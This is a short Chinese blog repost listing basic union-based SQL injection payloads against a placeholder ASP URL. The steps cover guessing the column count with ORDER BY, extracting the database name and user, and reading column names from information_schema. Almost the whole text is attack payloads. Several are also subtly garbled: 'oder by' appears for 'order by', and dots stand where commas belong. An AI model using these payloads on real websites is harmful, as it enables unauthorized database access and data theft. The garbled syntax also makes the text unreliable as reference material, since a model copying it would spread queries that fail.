码迷,mamicode.com
首页 > 数据库 > 详细

SQL注入语法

时间:2018-07-01 18:56:50      阅读:188      评论:0      收藏:0      [点我收藏+]

标签:ble   www   column   访问   注入   数据表   from   .com   3.4   

不考虑防护措施的情况下常规注入语句

网站http://www.xxxx.com/xxxx/1.Asp?id=1

猜字段http://www.xxxx.com/xxxx/1.Asp?id=1   oder by X        X=(1.2.3.4.5.6.....)直至网站访问正常为止。

查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.database().5    查询数据库名

查询数据库http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.user().5    查数据库用户

查询表明http://www.xxxx.com/xxxx/1.Asp?id=1   union select 1.2.3.4.column_name from information_schema.columns where table_name = 数据表名hex值

SQL注入语法

标签:ble   www   column   访问   注入   数据表   from   .com   3.4   

原文地址:https://www.cnblogs.com/52xuege/p/9250807.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!